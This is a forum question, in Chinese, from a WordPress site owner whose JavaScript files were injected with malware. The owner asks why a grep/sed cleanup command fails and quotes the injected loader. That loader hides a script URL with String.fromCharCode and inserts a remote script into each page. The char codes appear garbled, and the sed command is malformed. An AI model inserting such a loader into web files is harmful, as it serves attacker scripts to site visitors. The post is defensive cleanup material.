最近,我注意到我所有的WP网站都在所有.js文件内部注入了恶意软件。我已经找到问题并进行修补,但是无法从文件中删除恶意软件行。我尝试了以下命令:
grep -rl "var gdjfgjfgj235f = 1; var d=document;var
s=d.createElement('script'); s.type='text\/javascript'; s.async=true;
var pl =
String.fromCharCode(104,116,112,115,58,47,99,114,105,46,97,110,108,101,109,121,111,100,107,106,63,61,38,117,98,48,54,48);
s.src=pl; if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s,document.currentScript); } else {
d.getElementsByTagName('head')[0].appendChild(s);}\/" \
| xargs sed -i "var gdjfgjfgj235f = 1; var d=document;var
s=d.createElement('script'); s.type='text\/javascript'; s.async=true;
var pl =
String.fromCharCode(104,48);
s.src=pl;if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s,document.currentScript); } else
{d.getElementsByTagName('head')[0].appendChild(s);}\/"
原始恶意代码为:
var gdjfgjfgj235f = 1; var d=document;var s=d.createElement('script');
s.type='text/javascript'; s.async=true; var pl =
String.fromCharCode(104,48);
s.src=pl; if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s,document.currentScript); } else {
d.getElementsByTagName('head')[0].appendChild(s); }/
与该恶意软件有关: https://blog.sucuri.net/2019/11/vulnerable-versions-of-adminer-as-a-universal-infection-vector.html